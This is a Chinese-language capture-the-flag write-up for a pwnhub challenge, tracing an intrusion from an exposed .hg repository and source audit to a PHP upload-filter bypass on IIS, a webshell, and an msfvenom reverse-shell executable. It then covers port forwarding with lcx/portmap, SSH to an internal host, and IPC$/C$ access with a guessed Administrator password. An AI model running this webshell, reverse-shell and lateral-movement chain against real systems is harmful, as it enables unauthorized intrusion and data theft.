好艰难的一趟旅程
网站看看没啥发现, 端口扫扫也没啥发现
然后用猪猪侠的dirfuzz 扫描路径, 可以扫到有file/.hg
路径, 然后用https://github.com/kost/dvcs-ripper 可以搞到源码
接下来就是代码审计一波
漏洞点在uploader.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 <?php session_start(); // Get the filename and make sure it is valid $filename = basename($_FILES['file']['name']); // Get the username and make sure it is valid $username = $_SESSION['userName']; if (!preg_match('/^[\w_\-]+$/', $username) ){ echo "Invalid username"; header("Refresh: 2; url=files.php"); exit; } if(isset($_POST['submit'])){ $filename =md5(uniqid(rand())); $filename = preg_replace("/[^\w]/i", "", $filename); $upfile = $_FILES['file']['name']; $upfile = str_replace(';',"",$upfile); $tempfile = $_FILES['file']['tmp_name']; $ext = trim(get_extension($upfile)); // null if(in_array($ext,array('php','php3','php5','php7','phtml'))){ die('Warning ! File type error..'); } if($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess') $ext = 'file'; $full_path = sprintf("./users_file_system/%s/%s.%s", $username, $filename,$ext); } if (move_uploaded_file($_FILES['file']['tmp_name'], $full_path) ){ header("Location: files.php"); exit; } else { header("Location: upload_failure.php"); exit; } function get_extension($file){ return strtolower(substr($file, strrpos($file, '.')+1)); } ?>
初看好像写的没问题, 但是之前随便看看站点的时候就发现了这是一个Windows server + IIS的站点
然后这个上传漏洞以前遇到过, 还写过wp
http://old.lazysheep.cc/2015/05/19/0x24/
然后通过Fuzz也可以bypass这个上传过滤, aklis.php%fe
也可以成功上传php文件
得到webshell以后, 用msf生成了个反弹shell的exe(aklis.exe)
1 $ msfvenom -p windows/shell_reverse_tcp LHOST=xxxx LPORT=6666 -f exe -o /tmp/reverse.exe
找个内网的ip: 172.31.5.95
, 通过xshell对该目标进行ssh连接, 用户是ubuntu
之后用的是dlive
里的lcx.exe
进行端口转发, 参考:
http://wps2015.org/drops/drops/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B8%AD%E8%BD%AC%E5%8F%91%E5%B7%A5%E5%85%B7%E6%80%BB%E7%BB%93.html
windows的命令:
1 C:\inetpub\wwwroot\file\users_file_system\dlive\> lcx.exe -slave xxx 10000 172.31.5.95 22
我的xxx机子的命令:
1 $ ./portmap -m 2 -p1 10000 -p2 12345
portmap
是linux下的lcx, 下载地址:http://www.vuln.cn/2791
然后就是通过ssh进行连接了
1 2 $ ssh ubuntu@xxx -p12345 password: abc@elk
密码从提示里知道的:
在根目录下发现了flag, 本以为做出来了, 然后得知是假的, 简直奔溃……
该ubuntu服务器, ubuntu用户可以sudo, 有root权限, 不过不能访问外面, 想装工具也不方便…
然后在/home/ubuntu/.bash_history
里找到了又一个内网ip: 172.31.13.133
在.bash_history
里也可以发现, 172.31.13.133
开了135, 139, 445
三个端口
然后就进行了一系列的找相关漏洞, 把相应端口转发出来用msf测试, 未果….
然后找到$IPC相关命令
在windows机子上使用命令:
1 2 3 4 5 6 7 8 9 C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "" /user:"" net use \\172.31.13.133\ipc$ "" /user:"" The command completed successfully. C:\inetpub\wwwroot\file\users_file_system\aklis>net view \\172.31.13.133 net view \\172.31.13.133 System error 5 has occurred. Access is denied.
但是没用, 尝试登陆…..
1 2 3 C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator" net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator" The command completed successfully.
登陆成功…..
密码是怎么得到的?
根据提示:
1 2017.01.15 11:50:00administrator:啊,好烦啊,需要设置那么多密码,偷懒好了,妈蛋,windows为啥还有密码策略。
然后查了下windows的密码策略
1 2 3 4 5 6 7 长度至少为 6 个字元 包含下列四种字元中的三种: 英文大写字元 (A 到 Z) 英文小写字元 (a 到 z) 10 进位数字 (0 到 9) 非英文字母字元 (例如: !、$、#、%) 建立或变更密码时会強制执行复杂 性需求
然后一猜就猜到了…..
之后是
1 2 3 C:\inetpub\wwwroot\file\users_file_system\aklis>net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator" net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator" The command completed successfully.
然后是进入D:
, 找flag, 但是没找到, 然后得知flag就是在该机子中, 然后搜了一波windows下的搜索文件命令:
1 2 3 4 D:\>for /r D: %i in (*flag*) do @echo %i for /r D: %i in (*flag*) do @echo %i D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\flag.txt D:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk
好了….找到flag了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 D:\>cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5" cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5" D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>dir dir Volume in drive D has no label. Volume Serial Number is B2D4-D0F2 Directory of D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5 12/12/2016 02:26 <DIR> . 12/12/2016 02:26 <DIR> .. 12/01/2017 08:35 31 flag.txt 10/06/2009 21:14 7,169 Workflow.Targets 10/06/2009 21:14 8,680 Workflow.VisualBasic.Targets 3 File(s) 15,880 bytes 2 Dir(s) 2,673,094,656 bytes free D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>type flag.txt type flag.txt pwnhub{flag:y0u f0und my h3art}